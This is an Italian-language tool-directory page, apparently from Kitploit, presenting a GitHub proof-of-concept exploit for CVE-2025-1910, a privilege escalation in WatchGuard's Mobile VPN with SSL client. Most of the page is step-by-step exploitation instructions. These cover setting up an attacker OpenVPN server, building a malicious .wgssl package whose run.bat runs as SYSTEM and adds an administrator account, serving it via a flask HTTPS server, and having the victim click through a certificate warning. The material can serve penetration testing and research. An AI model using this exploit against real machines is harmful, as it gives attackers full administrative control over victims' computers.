Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1910-WatchGuard-Privilege-Escalation — Prova di concetto per lo sfruttamento di CVE-2025-1910, un'escalation dei privilegi locali nel client Mobile VPN with SSL di Watchguard. | Kitploit
Strumenti/GitHubGitHub/lutrasecurity/cve-2025-1910-watchguard-privilege-escalation
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitMovimento LateralePost-ExploitPenetration TestingCommand and ControlRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHublutrasecurity/cve-2025-1910-watchguard-privilege-escalation

CVE-2025-1910-WatchGuard-Privilege-Escalation

Prova di concetto per lo sfruttamento di CVE-2025-1910, un'escalation dei privilegi locali nel client Mobile VPN with SSL di Watchguard.

Vedi Repository
7 mesi faNon ancora revisionato

WatchGuard Mobile VPN with SSL - Escalation dei privilegi del client (CVE-2025-1910)

Una vulnerabilità di escalation dei privilegi in Mobile VPN with SSL di WatchGuard <= 12.11.2 consente a un utente con privilegi limitati di eseguire comandi come SYSTEM sul client. Testata con la versione 12.11.2 di Mobile VPN with SSL.

Per maggiori dettagli, consulta il nostro articolo del blog (versione tedesca).

Sfruttamento

Preparazione sul server dell'attaccante

  1. Avvia un server OpenVPN che accetta tutte le connessioni:
root@kitploit:~
sudo openvpn --config server.conf

Server OpenVPN avviato.

  1. Modifica l'opzione remote in ./client/client.ovpn per puntare al server OpenVPN

  2. Modifica ./client/run.bat come preferisci; questo script verrà eseguito come SYSTEM. Per impostazione predefinita, viene creato un nuovo utente amministratore (shinyNewAdmin)

  3. Crea il file client.wgssl malevolo di WatchGuard:

root@kitploit:~
cd client/

# Create checksum
md5sum client.ovpn run.bat > MD5SUM

# Pack into a .wgssl file
tar -czf ../client_exploit.wgssl client.ovpn  MD5SUM  run.bat

cd ..
  1. Servi il file client.wgssl malevolo tramite flask:
root@kitploit:~
# Start the flask HTTPS server
sudo python3 srv.py

Server web flask avviato.

Facoltativamente, è possibile creare una nuova coppia certificato e chiave tramite openssl:

root@kitploit:~
# Create certificate and private key for the HTTPS connection
openssl req -x509 -newkey rsa:4096 -nodes -out server.crt -keyout server.key -days 365 -subj "/CN=firebox"

Sfruttamento sulla macchina vittima

Quindi, sulla macchina vittima in cui è installata una versione vulnerabile di Mobile VPN with SSL (ad esempio la versione 12.11.2, Download), prova a connetterti al server dell'attaccante. Il nome utente e la password inseriti non hanno importanza:

Connessione al server dell'attaccante.

Fai clic su Sì nell'avviso di sicurezza per ignorare gli avvisi del certificato:

Connessione al server dell'attaccante.

Dopo che la connessione è stata stabilita correttamente, il file run.bat viene eseguito e l'utente shinyNewAdmin viene creato:

L'utente shinyNewAdmin è stato creato.

Configurazione

Sul server dell'attaccante devi avere installati Python, openssl e openvpn. Inoltre, è necessario installare il pacchetto Python flask:

root@kitploit:~
pip install -r requirements.txt

Nix Flake

Con Nix installato, puoi semplicemente avviare la shell di sviluppo:

root@kitploit:~
nix develop
Scarica lo strumento